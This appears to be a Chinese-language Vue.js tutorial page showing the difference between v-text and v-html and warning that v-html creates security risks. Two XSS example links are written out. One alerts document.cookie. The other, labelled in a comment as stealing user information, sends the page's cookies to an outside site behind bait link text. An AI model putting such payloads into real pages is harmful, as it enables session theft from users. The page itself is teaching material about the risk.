<!DOCTYPE html>
<html lang="en">
  <head>
    <meta charset="UTF-8" />
    <meta name="viewport" content="width=device-width, initial-scale=1.0" />
    <title>v_html指令</title>
    <!-- 引入Vue.js -->
    <script src="../js/vue.js"></script>
  </head>
  <body>
    <!-- 准备好一个容器 -->
    <div id="root">
      <div id="root">
        <div>你好,{{name}}</div>
        <!-- v-text 不能解析标签 -->
        <div v-text="str"></div>
        <!-- v-html 可以解析标签 -->
        <div v-html="str"></div>
        <!-- 存在安全性问题 -->
        <div v-html="getCookie"></div>
        <div v-html="str1"></div>
      </div>
    </div>
  </body>
  <script>
    const vm = new Vue({
      el: "#root",
      data() {
        return {
          name: "张老三",
          str: "<h3>你好呀！</h3>",
          // 获取到当前页面的全部cookie并以查询字符串的形式传递给指定的网站,盗用用户的信息
          str1: '<a href=javascript:location.href="http://www.baidu.com?"+document.cookie>我这有好看的快来</a>',
          getCookie:
            "<a href=javascript:alert(document.cookie)>点我获取当前页面的cookie</a>",
        }; // 在a标签中写js代码，会直接执行，所以存在安全性问题
      },
    });
  </script>
</html>
